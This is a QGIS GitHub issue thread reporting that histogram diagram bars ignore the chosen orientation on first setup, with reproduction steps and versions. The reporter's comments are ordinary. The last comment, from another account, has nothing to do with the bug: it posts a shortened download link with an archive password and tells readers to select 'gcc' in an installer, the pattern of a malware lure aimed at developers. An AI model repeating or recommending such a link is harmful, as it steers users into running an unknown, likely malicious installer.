### ISSUE TITLE
Histogram bar orientation is always Up in a first diagram setup

### ISSUE THREAD

**Issue by gacarrillor** [qgis/QGIS#58501]
### What is the bug or the crash?

Histograms' bar orientation is always `Up` when first setting up the diagram (i.e., starting from `No Diagram`). Changing the orientation and clicking on `Apply` does not update the histogram orientation on the map canvas.

Only when reopening the dialog, one can change the orientation and click on `Apply` to see changes.

### Steps to reproduce the issue

1. Load a point layer.
2. Open the Layer Diagram Properties dialog.
3. Set up a histogram diagram.
4. In the `Options` tab, select an option other than `Up`.
5. Click on `Apply`.
6. Histogram bars are not oriented according to 4.

### Versions

QGIS 3.38 and QGIS master.

### Supported QGIS version

- [X] I'm running a supported QGIS version according to [the roadmap](https://www.qgis.org/en/site/getinvolved/development/roadmap.html#release-schedule).

### New profile

- [ ] I tried with a new [QGIS profile](https://docs.qgis.org/latest/en/docs/user_manual/introduction/qgis_configuration.html#working-with-user-profiles)

**Comment by gacarrillor** [comment]
This will be solved in an incoming PR, just created this issue for reference.

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
